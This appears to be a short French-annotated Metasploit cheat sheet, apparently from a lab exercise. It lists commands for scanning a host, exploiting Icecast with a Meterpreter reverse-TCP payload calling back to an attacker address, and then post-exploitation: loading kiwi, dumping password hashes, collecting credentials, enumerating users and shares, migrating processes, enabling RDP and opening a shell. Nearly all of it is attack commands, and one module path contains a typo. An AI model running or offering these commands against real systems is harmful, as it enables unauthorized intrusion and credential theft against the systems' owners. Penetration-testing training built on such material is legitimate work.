msfconsole
db_nmap -sV 10.9.0.16
hosts
services
vulns
use exploit/windows/http/icecast_header
set rhosts 10.9.0.16
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.0.15
exploit
Dans une session meterpreter (POST Exploitation)
getuid
sysinfo
load kiwi
getprivs
upload
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
run post/windows/gather/usb_history
run post/windows/manage/migrate
run post/windows/gather/enum_applications #voir les applications qui sont installés
run post/windows/gather/enum_logged_on_users
run post/windows/gther/checkvm
run post/multi/recon/local_exploit_suggester
run post/windows/gather/hashdump
run post/windows/gather/enum_snmp
run post/windows/gather/enum_shares
run post/windows/gather/credentials/credential_collector
run post/windows/manage/enable_rdp #besoi d'être administrateur
shell